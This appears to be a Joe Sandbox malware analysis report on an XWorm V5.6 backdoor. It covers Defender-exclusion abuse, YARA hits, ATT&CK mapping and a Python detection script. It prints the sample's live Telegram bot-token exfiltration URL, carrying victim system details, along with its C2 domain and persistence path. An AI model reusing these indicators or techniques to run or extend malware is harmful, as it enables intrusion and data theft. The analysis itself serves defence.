Source: VJV2AjJ7Na.exe, 00000000.00000002.3360702564.000000000300A000.00000004.00000800.00020000.00000000.sdmp, VJV2AjJ7Na.exe, 00000000.00000002.3360702564.0000000002B76000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
Source: VJV2AjJ7Na.exe, 00000000.00000002.3360702564.000000000300A000.00000004.00000800.00020000.00000000.sdmp, VJV2AjJ7Na.exe, 00000000.00000002.3360702564.0000000002B76000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
Source: VJV2AjJ7Na.exe, 00000000.00000002.3360702564.000000000300A000.00000004.00000800.00020000.00000000.sdmp, VJV2AjJ7Na.exe, 00000000.00000002.3360702564.0000000002B76000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager2
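The process creations above are the standard Defender-exclusion pattern: a non-administrative parent (the sample on the user's Desktop) spawns powershell.exe with -ExecutionPolicy Bypass and Add-MpPreference to exclude its own path, its dropped copy in AppData\Roaming, and both process names. The Python below is an added example, not code from the report or from the sample: a detection that runs over Sysmon Event ID 1 / Security 4688 style process-creation records, extracts the exclusion targets, and goes one step beyond the command lines shown here by also decoding the -EncodedCommand form of the same cmdlet. The event field names, the list of expected parent processes, and the sample records are constructed for the example.

```python
"""Flag PowerShell Defender-exclusion tampering in process-creation telemetry.

Added example, not code from the report or from the sample. It turns the
command lines listed in the report (Add-MpPreference -ExclusionPath /
-ExclusionProcess run with -ExecutionPolicy Bypass) into a detection over
Sysmon Event ID 1 or Security 4688 style records and also handles the
-EncodedCommand variant. Field names and the sample records are constructed.
"""
import base64
import re
from typing import Dict, List, Optional

EXCLUSION_PARAMS = ("ExclusionPath", "ExclusionProcess", "ExclusionExtension", "ExclusionIpAddress")
# Assumed: parents an administrator would plausibly launch this from; anything else is suspicious.
EXPECTED_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "services.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
_ENC = re.compile(r"(?i)(?:-|/)e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
# -ExclusionPath 'value' (quotes optional); captures the parameter and its value.
_EXCL = re.compile(r"(?i)-(%s)\s+['\"]?([^'\"\s]+)" % "|".join(EXCLUSION_PARAMS))


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE script text; return it decoded, or None."""
    m = _ENC.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for one process-creation event, or None if it is not of interest."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image not in ("powershell.exe", "pwsh.exe"):
        return None
    cmd = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    script = decoded or cmd                       # inspect the decoded script when there is one
    if "add-mppreference" not in script.lower():
        return None
    exclusions = _EXCL.findall(script)
    if not exclusions:
        return None
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    return {
        "parent": parent,
        "parent_unexpected": parent not in EXPECTED_PARENTS,
        # -ExecutionPolicy Bypass, -ep bypass, -exec bypass
        "execution_policy_bypass": bool(re.search(r"(?i)-e\w*\s+bypass", cmd)),
        "encoded": decoded is not None,
        "exclusions": exclusions,                 # list of (parameter, value)
    }


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    return [f for f in (analyse(e) for e in events) if f]


# Constructed events, modelled on the command lines in this report.
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENCODED = base64.b64encode(
    "Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Roaming\\XClient.exe'".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    {"Image": _PS, "ParentImage": r"C:\Users\user\Desktop\VJV2AjJ7Na.exe",
     "CommandLine": f'"{_PS}" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess \'VJV2AjJ7Na.exe\''},
    {"Image": _PS, "ParentImage": r"C:\Users\user\Desktop\VJV2AjJ7Na.exe",
     "CommandLine": f'"{_PS}" -ExecutionPolicy Bypass -EncodedCommand {_ENCODED}'},
    {"Image": _PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f'"{_PS}" Get-MpPreference'},   # benign read-only query
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Two findings come back for the constructed records, each carrying the excluded target so a responder can go straight to the file. Whether the exclusions actually landed depends on the integrity level the parent ran at, since Add-MpPreference needs administrative rights; `Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess` on the host confirms it either way.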

Language, Device and Operating System Detection

Source: Yara match | File source: VJV2AjJ7Na.exe, type: SAMPLE
Source: Yara match | File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Queries volume information: C:\Users\user\Desktop\VJV2AjJ7Na.exe VolumeInformation
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information (VolumeInformation) for the following files, in this order; the full sequence is listed three times, followed by its first five entries once more:
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
  C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
  C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
  C:\
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (2 occurrences)
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
  C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
  C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll (3 occurrences)
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (3 occurrences)
  C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: VJV2AjJ7Na.exe, 00000000.00000002.3391026610.000000001B7B5000.00000004.00000020.00020000.00000000.sdmp, VJV2AjJ7Na.exe, 00000000.00000002.3396170228.000000001C2EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: VJV2AjJ7Na.exe PID: 6496, type: MEMORYSTR
Source: Yara match | File source: VJV2AjJ7Na.exe, type: SAMPLE
Source: Yara match | File source: 0.0.VJV2AjJ7Na.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2103665413.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3360702564.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3360702564.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: VJV2AjJ7Na.exe PID: 6496, type: MEMORYSTR
Source: Yara match | File source: VJV2AjJ7Na.exe, type: SAMPLE
Source: Yara match | File source: 0.0.VJV2AjJ7Na.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2103665413.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3360702564.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3360702564.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
MITRE ATT&CK Matrix (grouped by tactic; a number preceding a technique is the report's signature-count badge, techniques without a number had no matching signature)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 12 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 2 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 12 Process Injection; 2 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 151 Virtualization/Sandbox Evasion; 12 Process Injection; 1 Deobfuscate/Decode Files or Information; 11 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 541 Security Software Discovery; 2 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 23 System Information Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Web Service; 11 Encrypted Channel; 1 Non-Standard Port; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph
ID: 1483225; Sample: VJV2AjJ7Na.exe; Start date: 26/07/2024; Architecture: WINDOWS; Score: 100

Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 17 other signatures

Contacted hosts:
• ip-api.com, 208.95.112.1, ports 49710, 80, TUT-ASUS, United States
• api.telegram.org, 149.154.167.220, ports 443, 49719, TELEGRAMRU, United Kingdom; signature: Uses the Telegram API (likely for C&C communication)
• main-although.gl.at.ply.gg, 147.185.221.21, ports 30970, 49720, SALSGIVERUS, United States

Process tree:
• VJV2AjJ7Na.exe (started); dropped file: C:\Users\user\AppData\Roaming\XClient.exe, PE32; signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; 3 other signatures
• powershell.exe (4 instances, each started by VJV2AjJ7Na.exe); signature: Loading BitLocker PowerShell Module
• conhost.exe (one instance started by each powershell.exe)

Antivirus Detection

Initial sample:
Source | Detection | Scanner | Label
VJV2AjJ7Na.exe | 79% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm
VJV2AjJ7Na.exe | 100% | Avira | HEUR/AGEN.1305769
VJV2AjJ7Na.exe | 100% | Joe Sandbox ML |

Dropped files:
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\XClient.exe | 100% | Avira | HEUR/AGEN.1305769
C:\Users\user\AppData\Roaming\XClient.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\XClient.exe | 79% | ReversingLabs | ByteCode-MSIL.Backdoor.XWorm

Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches

URLs:
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://crl.m | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
https://ion=v4.5alC | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
http://www.microsoft.co | 0% | Avira URL Cloud | safe
http://crl.ml | 0% | Avira URL Cloud | safe
http://crl.mic | 0% | Avira URL Cloud | safe
http://go.microsoft.c | 0% | Avira URL Cloud | safe
main-although.gl.at.ply.gg | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A55D979A7C4323CB5C4DA%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20D3K68%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 | 0% | Avira URL Cloud | safe
http://go.microsoft.ctain | 0% | Avira URL Cloud | safe
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
main-although.gl.at.ply.gg | 147.185.221.21 | true | true | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
main-although.gl.at.ply.gg | true | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot7208700451:AAHHz5xWybJ91pH6F9vJRw8dcMEBlRiBXKs/sendMessage?chat_id=6131620354&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A55D979A7C4323CB5C4DA%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20D3K68%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 | false | Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
URLs from memory and binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2199242127.0000025C24A53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2285409152.00000249247C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2412961852.000001DBDDE53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.m | powershell.exe, 00000005.00000002.2301226661.000002492CDBF000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.ml | powershell.exe, 00000002.00000002.2206032792.0000025C2D061000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ion=v4.5alC | powershell.exe, 0000000A.00000002.2645209881.0000025A60A70000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot | VJV2AjJ7Na.exe, XClient.exe.0.dr | true | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.2178194155.0000025C14C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2236580950.000002491497A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2332095962.000001DBCE008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.2178194155.0000025C14C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2236580950.000002491497A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2332095962.000001DBCE008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2199242127.0000025C24A53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2285409152.00000249247C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2412961852.000001DBDDE53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.microsoft.co | powershell.exe, 00000005.00000002.2301226661.000002492CDDE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.mic | powershell.exe, 00000008.00000002.2435104153.000001DBE65E6000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000A.00000002.2616559361.0000025A58582000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://go.microsoft.c | powershell.exe, 00000002.00000002.2177459096.0000025C12DFB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://go.microsoft.ctain | powershell.exe, 00000002.00000002.2177459096.0000025C12DFB000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2178194155.0000025C149E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2236580950.0000024914751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2332095962.000001DBCDDE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2477660011.0000025A48511000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | VJV2AjJ7Na.exe, 00000000.00000002.3360702564.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2178194155.0000025C149E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2236580950.0000024914751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2332095962.000001DBCDDE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2477660011.0000025A48511000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000A.00000002.2477660011.0000025A4873A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
147.185.221.21 | main-although.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1483225
Start date and time: 2024-07-26 21:21:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: VJV2AjJ7Na.exe (renamed because original name is a hash value)
Original Sample Name: a9f1d82a7954d86d746086969c0d7b7b5ca65ccfd0d6a375931a6826eca1a8c7.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@13/19@3/3
EGA Information:
• Successful, ratio: 20%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 46
• Number of non-executed functions: 7
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1208 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1216 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 3300 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 736 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: VJV2AjJ7Na.exe
Time | Type | Description
15:22:00 | API Interceptor | 55x Sleep call for process: powershell.exe modified
15:22:53 | API Interceptor | 332905x Sleep call for process: VJV2AjJ7Na.exe modified
21:22:56 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | CTIPUPiILj.exe | malicious | AsyncRAT, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | Built.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | JGKjBsQrMc.exe | malicious | Amadey, Babadeda, RedLine, Stealc, Vidar | ip-api.com/json
208.95.112.1 | LisectAVT_2403002A_1.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | LisectAVT_2403002A_147.exe | malicious | Blank Grabber | ip-api.com/json/?fields=225545
208.95.112.1 | LisectAVT_2403002A_368.exe | malicious | Blank Grabber, DCRat, Umbral Stealer | ip-api.com/json/?fields=225545
208.95.112.1 | LisectAVT_2403002A_473.exe | malicious | Njrat, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | LisectAVT_2403002A_473.exe | malicious | Njrat, XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | LisectAVT_2403002A_52.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | LisectAVT_2403002B_109.exe | malicious | Blackshades | ip-api.com/json/
149.154.167.220 | zx.ps1 | malicious | Unknown | -
149.154.167.220 | new order 00041221.exe | malicious | Snake Keylogger, VIP Keylogger | -
149.154.167.220 | 7NeoZ6OBn2.exe | malicious | Unknown | -
149.154.167.220 | 7NeoZ6OBn2.exe | malicious | Unknown | -
149.154.167.220 | file.exe | malicious | Unknown | -
149.154.167.220 | file.exe | malicious | Unknown | -
149.154.167.220 | file.exe | malicious | Unknown | -
149.154.167.220 | LisectAVT_2403002A_127.exe | malicious | AgentTesla | -
149.154.167.220 | LisectAVT_2403002A_74.exe | malicious | AgentTesla | -
149.154.167.220 | New Order.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | -
